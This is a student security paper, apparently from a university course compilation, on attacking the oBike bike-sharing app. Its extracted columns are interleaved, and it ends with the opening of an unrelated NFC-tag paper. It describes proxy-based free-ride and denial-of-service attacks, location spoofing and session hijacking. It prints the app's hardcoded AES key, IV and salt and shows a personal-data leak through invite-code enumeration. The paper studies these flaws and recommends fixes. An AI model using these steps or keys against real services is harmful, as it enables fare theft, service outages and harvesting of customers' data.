registration process, the user is prompted to place a deposit before
unlimited​ ​usage​ ​of​ ​a​ ​bike​ ​without​ ​having​ ​to​ ​pay​ ​for​ ​it.
he​ ​can​ ​start​ ​renting​ ​a​ ​bicycle.
Categories​ ​and​ ​Subject​ ​Descriptors Next, the app will show the location of bicycles available for rent
K.6.5 [​Security and Protection​]: IOT Hacking, Secure around the user. The user will then walk towards one of the
implementation​ ​of​ ​protocols bicycles and scan the QR code on its lock. The app will do a
series of background actions (detailed in the following sections)
General​ ​Terms and the bike will be physically unlocked. Each account is only
Design,​ ​Security allowed​ ​to​ ​unlock/rent​ ​at​ ​most​ ​a​ ​single​ ​bike​ ​at​ ​any​ ​point​ ​in​ ​time.
Keywords
Internet​ ​of​ ​Things
2.1 Unlocking​ ​the​ ​Bicycle
When the user scans the QR code, the app sends a request to the
bike sharing company’s API. Parameters such as the bicycle’s
1. INTRODUCTION Bike ID and the User’s ID are attached to the request. The request
Bike Sharing System is a service where bicycles are made is​ ​encrypted​ ​before​ ​it​ ​is​ ​sent​ ​to​ ​the​ ​API.
available for users to share and use for a short period of time. It is
a relatively new system brought into Singapore which started to The app will then receive an unencrypted response, upon which
gain media attention and traction in early 2017. The wide the app parses the response and determines whether the server has
availability of rental bicycles and its low cost has proved to be approved the request to unlock the bike or not. In the case of it
popular with the masses. In order to offer low prices to its being approved, the response will contain the bike unlock keys.

gp03
PDFsam_merge 17
21
The app will then package the keys in an encrypted BTLE 3.3 API​ ​Requests​ ​&​ ​Responses
message​ ​and​ ​send​ ​it​ ​to​ ​the​ ​bike,​ ​releasing​ ​the​ ​lock​ ​on​ ​the​ ​bicycle.
API​ ​Endpoint:
The lock will then send a BTLE message back to the app, https://mobile.o.bike/api/v2/CATEGORY/ACTION
informing the app that the bicycle has been successfully unlocked. Example​ ​APIs:
The app will then send a request to the API (acknowledgement https://mobile.o.bike/api/v2/bike/060508811/lockNo
packet), informing the server that the bicycle is now in use. At this https://mobile.o.bike/api/v2/member/account
point, the app will reflect a new ride being started and the unlock https://mobile.o.bike/api/v2/bike/unlockPass
button​ ​will​ ​be​ ​disabled.
There are also instances when the unlocking process fails. In this Request​ ​Method:​ ​POST
case, the app also sends a request to the API, but informs the Request​ ​Type:​ ​JSON
server that the unlocking process has failed instead. The unlock Request​ ​Body:​ ​Single​ ​‘value’​ ​field​ ​containing​ ​an​ ​encrypted​ ​string
button in this scenario will remain unlocked and user can either Response​ ​Type:​ ​JSON
try​ ​again​ ​or​ ​try​ ​to​ ​scan​ ​the​ ​code​ ​of​ ​another​ ​bike. Response​ ​Body:​ ​Plaintext

2.2 Locking​ ​the​ ​Bicycle 4. PLANNING​ ​THE​ ​ATTACKS


Upon completing the ride, the user will push a lever to lock the The team had set forth the following objectives in our exploration
bike. The lock will then send a BTLE message back to the app, for​ ​weaknesses​ ​in​ ​oBike’s​ ​bike​ ​sharing​ ​platform:
informing the app that the bike has been locked. The app will also
send a request back to the API, informing the server that the bike 1. Unauthorized​ ​Bike​ ​Unlocking​ ​(Primary​ ​Objective)
is now locked, placed at that particular location and is available 2. Request​ ​Forgery
for​ ​the​ ​next​ ​user. 3. DoS​ ​Attacks
Through initial research and investigation, several links within the
system architecture have been identified to potentially contain
3. TECHNICAL​ ​DETAILS weaknesses/vulnerabilities. These links are identified to be the
communication channel between the server and the app, which
3.1 System​ ​Architecture communicates with API requests and responses, and the
communication channel between the app and the bike, which
communicates​ ​via​ ​BTLE.
After having identified these links, coupled with the knowledge of
how the sharing system works, the team has came out with a list
of potential attacks that might expose vulnerabilities and system
flaws.​ ​These​ ​potential​ ​attacks​ ​include:
As can be seen from the diagram. The bike does not seem to have
any connection/communication channel with the server. App​ ​to​ ​Bike
Everything goes through the phone. The phone acts as a relay ● Replaying​ ​of​ ​BTLE​ ​messages​ ​from​ ​a​ ​previous​ ​session
between​ ​the​ ​bike​ ​and​ ​the​ ​server. ● Sending​ ​of​ ​forged​ ​BTLE​ ​messages
App​ ​to​ ​Server
3.2 BTLE​ ​Message​ ​Structure ● Interfering with API requests (e.g. blocking of
Bike’s​ ​BTLE​ ​device​ ​manufacturer:​ ​Texas​ ​Instruments acknowledgement​ ​packet,​ ​etc.)
Packet​ ​Size:​ ​Ranging​ ​from​ ​14​ ​-​ ​31​ ​Bytes ● Modifying API responses to enable certain features of
the app (client sided) and checking for server side
Updating​ ​bike​ ​internal​ ​coordinates: validation
● Updating the server with fake location data of a bike
(location​ ​spoofing)
● Sending lock API request directly after unlocking
Updating​ ​bike​ ​internal​ ​coordinates​ ​(Continued): (minimum​ ​fee​ ​ride)
● Sending multiple API requests to the server containing
random/malformed​ ​data
Presumably​ ​the​ ​unlock​ ​code: ● Sending API requests that would trick the server into
thinking​ ​the​ ​bike​ ​is​ ​faulty
● Sending API requests to reserve multiple bikes
indefinitely
Presumably​ ​the​ ​unlock​ ​code​ ​(Continued): ● Session​ ​Hijacking

gp03
PDFsam_merge 18
22
5. EXECUTION
5.1 Replaying​ ​of​ ​BTLE​ ​messages​ ​from​ ​a
previous​ ​session
One of the very first attacks attempted was a BTLE replay attack.
Since the app and the bike communicates purely through BTLE,
intuitively the replay attack came into focus. In order to carry out
the attack, the team used a open source python script
(BLE-Replay) to reply BTLE packets captured on an Android
phone​ ​that​ ​have​ ​recently​ ​unlocked​ ​a​ ​bike​ ​through​ ​the​ ​oBike​ ​app. The bike application acts as the communication medium between
the BTLE device (bike) and the server. This architecture exposes
The packets was first verified to be captured with proper it to MITM attacks where the attacker can create, modify and drop
formatting before putting through the script. In addition, in order packets.
to reduce the chances of false-negative, packets of 3 separate
bikes were captured and the 3 bikes were physical positioned side Attempts were made to get free rides. These attempts were done
by side in range of the attack machine. The packets were then put through dropping packets that were meant to be sent to the server
through​ ​the​ ​script​ ​for​ ​the​ ​reply​ ​attack​ ​to​ ​be​ ​carried​ ​out. as acknowledgement for the start and end time of the journey. The
ability to interfere with the API requests were possible through
After running the script, there was no visible change/movement
setting​ ​a​ ​proxy​ ​between​ ​the​ ​application​ ​and​ ​the​ ​server.
on​ ​the​ ​bike​ ​locks.​ ​The​ ​attack​ ​had​ ​failed.
Upon going through our proxy logs, 3 instances across 2 different
APIs where the acknowledgement packet/request was being sent
5.2 Sending​ ​of​ ​forged​ ​BTLE​ ​messages were determined. Firstly, during the initial unlocking of the bike
By just observing the packets captured, it is clear that with the through the lockMessage API. Secondly, during the physical
exception of the update location packet, other packets looked locking of the bike also through the lockMessage API. Lastly, in
gibberish. Thus, in order to forge or modify the BTLE messages, the event where the app did not receive a response from the server
One would first have to find out how the messages were after sending the acknowledgement packet/request described
encrypted​ ​and​ ​decrypted. above, a fail safe mechanism would retry and send the
acknowledgement packet again through the hisLockMessage API
In order to fully understand what the packets are conveying, the when the app is restarted. Hence upon uncovering these instances,
oBike app is decompiled to give a bare view of the source code we​ ​are​ ​now​ ​ready​ ​to​ ​put​ ​our​ ​hypothesis​ ​to​ ​the​ ​test.
and its internal operations. Decompiled source code have rename
obfuscation applied, making understanding the app internal Steps​ ​took​ ​and​ ​things​ ​tried:
workings​ ​a​ ​challenge. Step 1: Setup a proxy to view and set rules to filter specific
packets.
Step​ ​2:​ ​Scan​ ​the​ ​QR​ ​Code​ ​to​ ​unlock​ ​the​ ​bike.
Step​ ​3:​ ​Confirm​ ​physical​ ​unlock​ ​of​ ​bike​ ​-​ ​First​ ​Instance
Step 5: Check and confirm that our proxy dropped the
acknowledgement​ ​packets/requests.
Step​ ​4:​ ​Check​ ​if​ ​app​ ​started​ ​a​ ​ride​ ​(recorded​ ​a​ ​start​ ​entry)
Step 5: After using the bike, manually lock the bike. - ​Second
Regardless, scouring, tracing and guessing through the source
Instance
code has lead the team to believe that part of the gibberish packets
are encrypted. However, as the decompiled source code is not the Step 6: Check and confirm that our proxy dropped the
exact source code, there are many segments of codes that are left acknowledgement​ ​packets/requests
uninterpreted or fully understood. Eventually, the team was not Step 7: Check if any ride was recorded as history in the
able​ ​to​ ​decrypt​ ​the​ ​packets​ ​nor​ ​send​ ​any​ ​forged​ ​BTLE​ ​messages. application.
Step​ ​8:​ ​Restart​ ​the​ ​app​ ​-​ ​Third​ ​Instance
5.3 Interfering​ ​with​ ​API​ ​requests Step 9: Check and confirm that our proxy dropped the fail safe
Attacks on the communication channel between the app and the acknowledgement​ ​packets/requests
server were conceived. It was hypothesized that blocking blocking Step 10: Check that no ride was started and no ride was recorded
certain API requests may confuse the server into thinking that the as​ ​history​ ​in​ ​the​ ​application.
bike is still locked even though the bike is already physically
unlocked. At each of those instances API request for the acknowledgement
packet/request was successfully blocked, the ride was not
recorded anywhere on the app and the server. This serves as a
proof to deem the hacking attempt to gain a free ride by
interfering​ ​API​ ​requests​ ​was​ ​a​ ​success.

gp03
PDFsam_merge 19
23
However, subsequently after the hack, it was found that the extent market. The oBike app would likewise be unable to tell if the
of the hack extends way more than just gaining a free ride. It location​ ​was​ ​spoofed​ ​or​ ​not.
seems that due to the blocking of the acknowledgement Another way of changing the location data can be done through
packets/requests, the server mistakenly deem the bike as being physical means. When the bicycle is moved from one location to
faulty. Hence, once the hacked bike is locked, it would not be another without unlocking the bicycle, the location data stored in
possible to unlock it again (server returns ‘faulty bike’ error the server will not be updated and thus, resulting in inaccurate
message) until either the admin manually resets the faulty status information​ ​for​ ​the​ ​bikers.
of the bike or a timeout happens on the server side. Through
observation, the timeout seems to be the next day. Meaning to say
if a bike was hacked on monday (regardless of time), it would
only​ ​be​ ​available​ ​again​ ​on​ ​tuesday​ ​(regardless​ ​of​ ​time).
5.6 Sending​ ​lock​ ​API​ ​request​ ​directly​ ​after
unlocking
Another attack conceived was to craft and send fake API requests
5.4 Modifying​ ​API​ ​responses​ ​to​ ​enable in attempt to gain rides at minimum cost.. First, the user has to
certain​ ​features​ ​of​ ​the​ ​app​ ​(client​ ​sided)​ ​and unlock the bicycle through the app. The app sends some API
requests and a ride is started. As the cost of ride increase as the
checking​ ​for​ ​server​ ​side​ ​validation rental time increases, the attack attempts to send an
oBike’s users are categorized under paid users and free users. Free acknowledgement packet/request immediately after the bike is
users are unable to rent any of the bikes. Free users only have the unlocked. This would ensure that the rental time is almost close to
ability to deposit money while paid users have access to all zero​ ​and​ ​the​ ​user​ ​would​ ​only​ ​have​ ​to​ ​pay​ ​the​ ​minimum​ ​fee.
features within the app. These features include scanning qr code
To do so, the user sends a crafted/forged request indicating the
and unlocking of bikes. As the app relies on the API response to
bicycle is locked without physically locking the bicycle. That
make this distinction, it is theoretically possible that the features
way, the server will be tricked into thinking the bicycle is locked,
are​ ​only​ ​restricted​ ​on​ ​the​ ​client​ ​side.
while the the bike remains unlocked. The user can then ride the
To put that theory to the test, a free account was used and API bicycle for an indefinite period of time without paying for the
responses were modified before the app receives it. Initial results extra​ ​time​ ​and​ ​also​ ​without​ ​the​ ​server​ ​knowing.
shows the user interface adapting to the change and unlocking
Through carrying out the actual attack, the assumptions and idea
certain buttons that only paid user have access. However, upon
were confirmed. The attack worked as expected and all rides only
trying to unlock the bike, an error message is prompted, asking
costs​ ​$0.50​ ​(minimum​ ​fee).
the user to deposit money. Hence, it seems that while the app acts
as a gatekeeper or coordinator of which API request is available,
the​ ​final​ ​validation​ ​still​ ​lies​ ​on​ ​the​ ​server​ ​side.
5.7 Sending​ ​multiple​ ​API​ ​requests​ ​to​ ​the
server​ ​containing​ ​random/malformed​ ​data
5.5 Updating​ ​the​ ​server​ ​with​ ​fake​ ​location Through observing the proxy logs and also the decompilation of
data​ ​of​ ​a​ ​bike the app, a complete list of API currently in used by the app can be
discovered. While it is unknown as to what this attack might
Because it is possible to communicate directly with the API, there
reveal, what is generally looked out for are holes within the
are plans to craft requests that would interfere with how the
validation mechanisms that the server might have in place when
system normally works. One such request planned was to tamper
dealing with API requests. These holes may come in the form of
with the location data which will be sent by the phone when the
explicit error messages that might reveal server/code details. It
bicycle is locked. This way, the location of the bicycle received
may also present itself as a heavy operation that takes a long time
by the server is no longer accurate. Other users will not be able to
to return a response or a malformed requests that was not rejected
find​ ​the​ ​bicycle​ ​at​ ​the​ ​location​ ​reflected​ ​on​ ​their​ ​app.
when​ ​it​ ​should​ ​have​ ​been.
Steps​ ​took​ ​or​ ​things​ ​tried:
The​ ​attack​ ​is​ ​carried​ ​out​ ​in​ ​3​ ​stages.
Step​ ​1:​ ​Setup​ ​a​ ​proxy​ ​to​ ​sniff​ ​the​ ​packets.
Firstly, API request were edited to contain missing or extra fields
Step​ ​2:​ ​Unlock​ ​the​ ​bicycle. that the server might or might not expect. However, this approach
Step​ ​3:​ ​Lock​ ​the​ ​bicycle. saw no loophole within the validation mechanism. Missing values
were flagged with a generic error message while extra fields
Step 4: Intercept location update packet, decrypt, modify the seems​ ​to​ ​be​ ​simply​ ​ignored.
location​ ​coordinates​ ​then​ ​encrypt.
Secondly, API request were edited to contain correct fields with
Step​ ​5:​ ​Send​ ​the​ ​modified​ ​packet​ ​to​ ​the​ ​server. incorrect/malformed values. Some strategies were used when
Step 6: Confirm that the location has been updated in the server changing the values. Values were changed to out of bound values
through​ ​reloading​ ​the​ ​app. ,SQL injections and logically impossible values (e.g. timestamp
was changed to 10 years ago). Unexpectedly, 2 of these edits were
Upon reloading the application, the location of the targeted bike not flagged by the system. 1 of the 2 edits was changing the
has​ ​been​ ​updated​ ​to​ ​the​ ​set​ ​location​ ​coordinates. timestamp of when a ride started, it resulted in the account being
Alternatively, if a user does not have a means of decrypting bugged and have ride with a negative ride time. The other edit
packets, which the above relies on, the user can also fake the was​ ​the​ ​server​ ​accepting​ ​impossible​ ​gps​ ​coordinates.
phone’s internal gps coordinates through various other apps on the

gp03
PDFsam_merge 20
24
Lastly, random API request were sent to non-existent API 6. ADDITIONAL​ ​FINDINGS
end-points. Expectedly, none of the attempts yielded anything
useful.​ ​A​ ​generic​ ​error​ ​message​ ​was​ ​returned. 6.1 API​ ​Encryption​ ​and​ ​Hash​ ​Techniques,
Secret​ ​Keys​ ​and​ ​IV
One major challenge, when creating/forging API request was the
5.8 Sending​ ​API​ ​requests​ ​that​ ​would​ ​trick encryption. Since the request was encrypted, any manipulation of
the​ ​server​ ​into​ ​thinking​ ​the​ ​bike​ ​is​ ​faulty the encrypted string can be immediately detected and rejected by
Apart from the vulnerability found in API Interference (Section the server. However, as part of the process of uncovering the
5.3), attempts were made to achieve similar results in tricking the BTLE encryption (see section 5.2), certain comments left by the
server to think that the bike was faulty. When a bike is deemed as developer in the decompiled source code were discovered. In
faulty, the server rejects all attempts to unlock the bike. Hence, if particular, a comment left by the developer "/* compiled from:
the​ ​server​ ​can​ ​be​ ​tricked,​ ​a​ ​denial​ ​of​ ​service​ ​attack​ ​is​ ​achieved. APIEncryptHelper */" was discovered, which eventually lead to
the understanding of how packets/requests between the App to
As the app contains a ‘report problem’ function, an idea to use it
Sever​ ​were​ ​encrypted.
to render a bike ‘faulty’ was conceived. The idea was tested but
the results varied. In some instances, the attack seemed to work Encryption​ ​Technique
after a period of time however in other instances, nothing seemed The request body is first converted into hex. The converted hex
to have changed. It is unclear if the bike status was maunually string is then encrypted using an encryption scheme, key and iv.
changed​ ​by​ ​the​ ​admin​ ​or​ ​by​ ​some​ ​automated​ ​code. Next, a hash value is calculated by hashing the request body
Another idea tested out was to try sending unlock API requests for appended​ ​with​ ​‘&’​ ​+​ ​key​ ​[hash(request-body&key)].
a single bike using 2 different accounts. The results showed that However, knowing just the technique isn’t enough. There are still
when an account sends the unlock API request, the bike is bound unknown elements that are not found. These unknown elements
to that account for the duration of the ride any additional requests include the encryption scheme, key, iv and hash scheme and key.
are rejected. Hence, this approach was not able to achieve a faulty Through further digging and tracing, it is discovered that all of our
status. unknown elements reside in an external library stored somewhere
within​ ​the​ ​app.
5.9 Sending​ ​API​ ​requests​ ​to​ ​reserve
multiple​ ​bikes​ ​indefinitely
One of the features offered by the oBike app is the ability to
reserve bikes. Each account is supposedly only able to reserve a
single bike at any moment. Reserved bikes are only unlockable by
the user that reserved it. Reserved bikes will remain reserved for a Subsequently, the library is located and disassembled using IDA
period of time until a timeout occurs or the user unlocks it. Hence, Pro. After analyzing the strings within the disassembled library,
if a vulnerability is found within the reservation sub-system, then, certain​ ​strings​ ​stood​ ​out.
a​ ​denial​ ​of​ ​service​ ​attack​ ​might​ ​be​ ​possible.
In order to carry out the attack, reserve API requests were logged.
Then multiple bike ids are recorded. With these 2 pieces of
information, the attack is ready. The idea is to send multiple
reserve API requests with different bike ids using the same
account. Upon carrying out the attack, error messages were
returned after the first reserve API request was sent. Through this
result, it would seem that the server validates each reservation
request​ ​and​ ​check​ ​if​ ​the​ ​account​ ​has​ ​a​ ​prior​ ​reservation.

5.10 Session​ ​Hijacking


The current system requires users to pay a fixed sum of deposit
before they are able to use the obike’s service. To bypass this
system, free users can make use of a paid user’s session id to use
the service (inspired by firesheep). This is done through crafting
the​ ​packets​ ​with​ ​the​ ​paid​ ​user​ ​session​ ​id​ ​before​ ​calling​ ​the​ ​API.
The limitation of this form of attack is that the session id can only After​ ​a​ ​few​ ​trial​ ​and​ ​error,​ ​all​ ​of​ ​the​ ​unknown​ ​elements​ ​are​ ​found.
lasts​ ​as​ ​long​ ​as​ ​the​ ​server​ ​set​ ​it​ ​to​ ​be. Encryption​ ​Scheme​ ​Type:​ ​Symmetric
The likelihood of such an attack is very low as API requests are Encryption​ ​Used:​ ​AES/CBC/PKCS5Padding
encapsulated in the https protocol, which makes sniffing of
session ids close to impossible. However, by combining other Key Used: oBAddMYFUzLed243 (oBAddMYFUzLed + app
attacks, session hijacking might be useful (discussed in section version​ ​number)
7.1). IV​ ​Used:​ ​1234567890123456

gp03
PDFsam_merge 21
25
Hash​ ​Used:​ ​SHA-1 every bike in the system to become ‘faulty’, achieving a service
Salt Used (appended to request data): &oBaddX4buhBMG243 (& wide​ ​denial​ ​of​ ​service​ ​attack.
+​ ​oBaddX4buhBMG​ ​+​ ​app​ ​version​ ​number)

8. EVALUATION​ ​OF​ ​ATTACKS


6.2 User​ ​Data​ ​Leak With the successful attacks documented in the previous sections,
During the execution process, a vulnerability that may have a we were able to achieve our main objective of obtaining
significant impact was discovered. This vulnerability leaks unauthorized bicycle unlocking. In addition, attacks such as
personal information about oBike’s customers, such as their name, spoofing the location of the bicycle, offering free rides to an
mobile phone number and email address. While this was not one attacker or even allow him to gain access to sensitive information
of the planned attacks, it is believed that the impact is significant were also found. However, while each attack exposes certain
enough​ ​and​ ​deserves​ ​a​ ​mention​ ​in​ ​the​ ​paper. flaws​ ​within​ ​the​ ​system,​ ​the​ ​severity​ ​of​ ​each​ ​attacks​ ​varies.
In our evaluation, we will evaluate each attack according to its
Examples: likelihood of occurring and its impact. The likelihood of the attack
https://mobile.o.bike/api/v1/member/coupon/invite?inviteCode=2 occurring is how easy it is for someone to replicate the attack. The
093818400 impact of the attack is a measure of how much damage it can
https://mobile.o.bike/api/v1/member/coupon/invite?inviteCode=1 cause to oBike as a company and/or the ability of the users to use
709071327513973 the​ ​service​ ​effectively.
Furthermore, as the system seem to use only integers for their
invite code, attackers can potentially run a loop to try a range of
integers​ ​and​ ​farm​ ​personal​ ​details. 8.1 Location​ ​Spoofing
With a set of simple instructions and some tools, an attacker can
easily replicate this attack. Because of that, it is easy for most
7. HYBRID​ ​ATTACKS people to carry out this attack. It is highly likely that this has
already been done by other attackers before due to its simplicity.
7.1 Session​ ​Hijacking​ ​+​ ​API​ ​Interference As​ ​such,​ ​the​ ​likelihood​ ​of​ ​this​ ​attack​ ​is​ ​high.
Using session hijacking, it will be possible to allow a free user to On top of that, location spoofing prevents users from getting the
use the features that are available to only paid users (unlocking of accurate location information of each bike. Users may think that
bikes). Together with the technique described in the API there are no bicycles available in their vicinity, therefore opting to
Interference segment (Section 5.3), free user will be able to using use another form of transport and cause a loss of revenue to
the service for free while paid user’s account will not be affected. oBike. It can also hinder oBike’s maintenance efforts as they are
This​ ​is​ ​a​ ​win​ ​for​ ​the​ ​hacker​ ​at​ ​the​ ​expense​ ​of​ ​the​ ​company. unable​ ​to​ ​locate​ ​and​ ​perform​ ​maintenance​ ​on​ ​their​ ​bicycles.
In the worst case scenario, an attacker can choose to spoof the
location of a very large number of oBikes. Users relying on the
7.2 MITM​ ​+​ ​API​ ​Interference app to locate a bicycle will not be able to do so, undermining the
This attack comes with a unique twist. The hacker in this attack user’s confidence in the reliability of the bike sharing system.
will be the paid user. The hacker can setup a proxy where free This loss of confidence can prove to be detrimental to oBike’s
users would connect to. The hacker can then modify free users’ growth as a company. The potential impact of this attack can
responses by sending a API request of his own. In the case of make​ ​is​ ​high.
unlocking the bike, the API request to get the unlock code will be
different for free and paid users. However, the hacker’s response With a high likelihood of this attack occurring and a high impact
(paid user) will then replace the free users’ response, allowing the it​ ​can​ ​potentially​ ​make,​ ​the​ ​overall​ ​severity​ ​of​ ​this​ ​attack​ ​is​ ​high.
free user to unlock the bike. In order for the hacker to not bear the
cost of the ride, the hacker can also use the API Interference
technique​ ​to​ ​mitigate​ ​the​ ​trip​ ​cost. 8.2 Unauthorized​ ​Unlocking
Again, with a set of simple instructions and some tools, an
attacker can easily replicate this attack. The simplicity of the
execution of this attack makes the likelihood of this attack to be
7.3 Map​ ​Surfing​ ​+​ ​API​ ​Interference high.
This attack potentially has the greatest impact on the oBike’s
business. oBike provides an API that returns a list of bikes within This attack actually allows a user to use the bicycle without
the radius of a certain location. This API is used to populate the paying for it. If this attack distributed to the masses, oBike’s main
bike finder feature they have implemented in their app. Along source of revenue will be cut off. oBike will experience heavy
with​ ​the​ ​location​ ​of​ ​the​ ​bike,​ ​the​ ​API​ ​also​ ​return​ ​the​ ​bike​ ​ids. losses​ ​and​ ​might​ ​not​ ​even​ ​be​ ​able​ ​to​ ​continue​ ​to​ ​run​ ​as​ ​a​ ​business.
Now that the bike ids are known, the attack can be carried out. By With a high likelihood of this attack occurring and a very high
leveraging on the vulnerability to make bike appear ‘faulty’ impact it can potentially make, the overall severity of this attack is
(section 5.3), we can craft fake unlock requests for each and every very​ ​high.
of these bikes and since the unlock process didn’t actually happen
there will be no acknowledgement request being generated and
sent to the server. This results in all of the bike being set to the
‘faulty’ status. Using this method, it would be possible to set

gp03
PDFsam_merge 22
26
8.3 Denial​ ​of​ ​Service
With carefully crafted requests sent to the server (section 5.3 &
section 7.3), the server may determine that the bicycle is faulty
and will no longer accept any more attempts to unlock it, be it
legitimate​ ​or​ ​not,​ ​until​ ​after​ ​a​ ​certain​ ​period​ ​of​ ​time.
The likelihood of this attack is low since it requires a moderate
level of technical expertise in crafting the requests. It will take a
significant​ ​amount​ ​of​ ​effort​ ​for​ ​a​ ​layman​ ​to​ ​replicate​ ​this​ ​attack.
As for the impact of this attack, it goes without saying that this is
a serious issue. The service wide denial of service would not only 2. Apply String Obfuscation (Android ProGuard,
paralyze the business but would also do great harm to the PreEmptive Solutions, etc.), making as much of the
reputation of the company. Customers would steadily lose code​ ​unreadable​ ​as​ ​possible
confidence in the company and would request for their refunds
back.​ ​This​ ​might​ ​make​ ​the​ ​company​ ​go​ ​out​ ​of​ ​business.
While the likelihood of this attack is low, the consequences of the
attack is devastating. Hence, the overall severity of this attack is
very​ ​high.
3. Compile without debug symbols, this would remove all
comments​ ​within​ ​the​ ​built​ ​app
9. RECOMMENDATIONS Shortcomings:
From the attacks described above, it is clear that the success of
these attacks revolves around 5 main weaknesses within oBike’s Obfuscation makes the code difficult to understand, but not
implementation​ ​and​ ​architecture. impossible to understand. With ample time, the attackers can still
understand​ ​the​ ​source​ ​code.
1. Weakness in security through obscurity of app source
code. By decompiling the app, attackers can easily
understand the internal workings (Comments are left 9.2 Improving​ ​the​ ​Unlock​ ​Protocol
inside and only rename obfuscation technique is
As introduced earlier, after the user unlock the bike, the app will
applied)
send the acknowledgement packet to the server. After that, the
2. Flaw in oBike’s unlock protocol/logic. The unlock
server will record the acknowledgement packet and start to charge
protocol/logic places too much trust and power on the
the user’s account. However, it was also mentioned that attackers
user.
could block the acknowledgement packet to use the bike without
3. Weakness in encryption scheme used. Symmetric
any​ ​being​ ​charged.
encryption is used to send requests to server. This can
be​ ​easily​ ​broken​ ​if​ ​the​ ​secret​ ​key​ ​is​ ​found. Hence, it is recommended that the server starts charging or least
4. Weakness through bad practice. Secret key and salt starts recording a trip being started upon sending the bike unlock
hashes are embedded within the application in plaintext, keys instead of only after the acknowledgement packet is
allowing​ ​attackers​ ​to​ ​easily​ ​discover​ ​them. received. This way, it protects the business interest of the
5. Weakness in choice of communication channels. Due to company and at the same time, attackers would be charged
the bike not being in communication with the server, all regardless. Since it is inevitable for the attacker to request for the
data have to be relayed through the app. This inherently bike unlock keys, it means that charging cannot be avoided.
exposes​ ​the​ ​entire​ ​architecture​ ​to​ ​MITM​ ​attacks. Purposefully blocking any packets in the later stages will only
result​ ​in​ ​a​ ​higher​ ​cost.
Our​ ​recommendation​ ​targets​ ​the​ ​5​ ​weaknesses​ ​detailed​ ​above.
However, some may argue that in the event of a legitimate failed
unlock process, users will still be unfairly charged. The solution to
9.1 Turn​ ​Up​ ​the​ ​Obfuscation that would be simple. The acknowledgement packet would relay
After decompiling the app, many details regarding the internal the status of the unlock process and the server can choose to
workings were revealed. Although rename obfuscation (section waive​ ​off​ ​whatever​ ​charges​ ​that​ ​have​ ​been​ ​incurred.
5.2) was applied, it was a weak measure against efforts to reverse The new unlock protocol described above would not only ensure
engineer. More notably, the comments left in the decompiled that there would be no incentive to block the acknowledgement
source shed light into much of how information is processed packets but would also ensure that the business interest is
within the app which included how request and data were preserved in any situation. In addition, gaining free rides would no
encrypted. As such, it is recommended for the following measures longer be as easy as blocking/dropping packets. Attackers would
to​ ​be​ ​applied​ ​on​ ​top​ ​of​ ​what​ ​is​ ​already​ ​implemented. now have to craft/forge acknowledgement packets that falsely
1. Apply Control Flow Obfuscation (Android Proguard, indicates a failed unlock process. This would require intimate
PreEmptive Solutions, etc.), adding noise to the code to knowledge of how requests are encrypted and also the secret keys
make​ ​the​ ​code​ ​difficult​ ​for​ ​human​ ​to​ ​understand and salts. While this is by no mean full-proof, it significantly
increase​ ​the​ ​difficulty​ ​of​ ​attack​ ​the​ ​protocol.
Shortcomings:

gp03
PDFsam_merge 23
27
An attacker with the knowledge of the secret keys and salts can 10. PROJECT​ ​CHALLENGES
still​ ​gain​ ​free​ ​rides.
10.1 Unfamiliar​ ​with​ ​BTLE
BTLE is a relatively new technology, coupled with the fact that
9.3 Preventing​ ​Users​ ​from​ ​Decrypting bluetooth has relatively low usage in the daily lives of most
people. This has lead to surface level of how the technology
Packets/Requests works,​ ​which​ ​has​ ​proven​ ​to​ ​be​ ​a​ ​challenge​ ​for​ ​the​ ​project.
After decompiling the app, the secret keys used in encrypting
request was exposed. It was also revealed that a symmetric
encryption scheme was used. In other words, a full break was 10.2 Decompiled​ ​Source​ ​Code
achieved. Asymmetric encryption would be a better choice. Even
after intercepting the packets/requests sent to the server, without The decompiled source code of the app was difficult to
the private key, which would only be stored in the server, it would understand.​ ​The​ ​flow​ ​of​ ​the​ ​program​ ​was​ ​hard​ ​to​ ​trace.
not be possible to decrypt the contents in a reasonable amount of
time. It would be hard to forge packets with valid content without
knowing the format of the plaintext. It would take a lot more time 11. ACKNOWLEDGEMENTS
and​ ​effort​ ​on​ ​the​ ​attackers​ ​part. We would like to thank Dr. Hugh Anderson for his unwavering
Shortcomings: support​ ​and​ ​guidance​ ​towards​ ​our​ ​project.

If the decompiled source code was understood completely, it


would be easy to find the format of plaintext by checking relevant
APIs.
12. REFERENCES
https://github.com/nccgroup/BLE-Replay
https://smartlockpicking.com/slides/HITB_AMS_2017_Blue_Pic
9.4 Applying​ ​Industry’s​ ​Best​ ​Practice king_-_Hacking_Bluetooth_Smart_Locks.pdf
Instead of storing secret keys in plaintext inside a external library. http://processors.wiki.ti.com/index.php/BLE_sniffer_guide
It is recommended to use Android KeyStore System instead. The
Android Keystore system lets you store cryptographic keys in a https://www.preemptive.com/obfuscation
container to make it more difficult to extract from the device. https://developer.android.com/training/articles/keystore.html
Once keys are in the keystore, they can be used for cryptographic
operations with the key material remaining non-exportable. https://developer.apple.com/library/content/documentation/Securit
Moreover, it offers facilities to restrict when and how keys can be y/Conceptual/keychainServConcepts/01introduction/introduction.
used, such as requiring user authentication for key use or html
restricting keys to be used only in certain cryptographic modes. In
iOS, Keychain Services is recommended. Keychain Services
provides secure storage of passwords, keys, certificates, and notes
for one or more users. A user can unlock a keychain with a single
password, and any Keychain Services–aware application can then
use​ ​that​ ​keychain​ ​to​ ​store​ ​and​ ​retrieve​ ​passwords.

9.5 Rethinking​ ​App​ ​Privileges


The app holds all power and communication between the server
and the bike. Because of this, the server is at the mercy of the app.
Hence, instead of letting the app play the middleman, the
company can consider installing additional hardware, so that tje
server​ ​and​ ​the​ ​bike​ ​can​ ​have​ ​direct​ ​communication.
Possible solutions could include only allowing bikes to
lock/unlock at stations (communicates directly to the server) built
by the company or alternatively, bikes may connect to the server
using the 3G network. It will be much harder to attack as
compared to an app, which can be easily decompiled and
intercepted.
Shortcoming:
The cost will be much higher. Battery issues due to additional
power​ ​requirements​ ​to​ ​power​ ​up​ ​additional​ ​components.

gp03
PDFsam_merge 24
28
Securing NFC Tags
Chua Yu Peng Lee Ying Jie Teng Yong Hao
National University of Singapore National University of Singapore National University of Singapore
e0002852@u.nus.edu a0130720@u.nus.edu e0003881@u.nus.edu

Wang Weili Aloysius


National University of Singapore
a0124472@u.nus.edu

ABSTRACT As briefly mentioned, NFC is projected to see a great rise in usage


and implementations in the near future. It is imperative that NFC
Given the widespread usage of NFC tags today, particularly at bus be secure and publicly accessible NFC tags be authenticated.
stops for advertising purposes, not many people have stopped to
consider whether these tags are safe to interact with, or even if This paper will thus look into the background and workings of
